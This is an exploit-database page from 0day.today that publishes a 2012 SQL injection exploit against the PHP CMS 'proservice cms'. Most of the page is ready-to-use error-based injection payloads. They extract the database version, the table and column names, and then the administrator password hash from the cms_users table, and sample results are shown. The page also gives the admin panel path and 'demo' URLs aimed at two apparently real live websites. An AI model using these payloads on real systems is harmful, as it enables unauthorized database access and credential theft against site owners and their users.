[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

proservice cms Sql Injection Vulnerablity

Author
cheki
Risk
[
Security Risk High
]
0day-ID
0day-ID-18691
Category
web applications
Date add
18-06-2012
Platform
php
# Exploit Title: proservice cms Sql Injection Vulnerablity
# Date: 18-06-2012
# Author: cheki
# Vendor Link: http://proservice.ge/
# Category:WebApp
# Price: NULL
# Contact: anrivardanidze@gmail.com
# Website: www.1337day.com && hacking.ge
# Greetings to: Anuka Bolqvadze and to rest of the 1337day members

  

########################################################################################
[Product Detail]

Studio "PRO-Service" is a company which has serious technical-intelectual base to
make a suitable production for you and provide the development of internet resources
in Georgia. 

Code: PHP

Database: MYSQL
########################################################################################
[Vulnerability]

SQL Injection:

http://<TARGET>/index.php?m=21&rec_id=[Sql]
http://<TARGET>/?m=268&cat_id=[Sql]

########################################################################################
Exploit: +and+(select+1+from+(select+count(0),concat((select+version()),floor(rand(0)*2))+from+information_schema.tables+group+by+2)a)--+

Result: Duplicate entry '5.0.811' for key 1

Exploit: +and+(select+1+from+(select+count(0),concat((select+table_name+from+information_schema.tables+limit+0,1),floor(rand(0)*2))+from+information_schema.tables+group+by+2)a)--+

Exploit: +and+(select+1+from+(select+count(0),concat((select+column_name+from+information_schema.columns+where+table_name='cms_users'+limit+1,1),floor(rand(0)*2))+from+information_schema.tables+group+by+2)a)--+

Result: Duplicate entry 'login1' for key 1

Exploit: +and+(select+1+from+(select+count(0),concat((select+column_name+from+information_schema.columns+where+table_name='cms_users'+limit+13,1),floor(rand(0)*2))+from+information_schema.tables+group+by+2)a)--+

Result: Duplicate entry 'password1' for key 1

Exploit: +and+(select+1+from+(select+count(0),concat((select+password+from+cms_users+limit+0,1),floor(rand(0)*2))+from+information_schema.tables+group+by+2)a)--+

Result: Duplicate entry 'd5e42cf45369ba368f3e97d4a8981b981' for key 1

#########################################################################################

G0 T0 Admin panel: http://<TARGET>/pcms/

#########################################################################################

D3m0: http://populi.ge/index.php?m=21&rec_id=7%27+and+%28select+1+from+%28select+count%280%29,concat%28%28select+password+from+cms_users+limit+0,1%29,floor%28rand%280%29*2%29%29+from+information_schema.tables+group+by+2%29a%29--+

D3m0: http://www.ee.ge/?m=268&cat_id=1224%27+and+%28select+1+from+%28select+count%280%29,concat%28%28select+version%28%29%29,floor%28rand%280%29*2%29%29+from+information_schema.tables+group+by+2%29a%29--+&stock_status=2



#  0day.today [2024-12-24]  #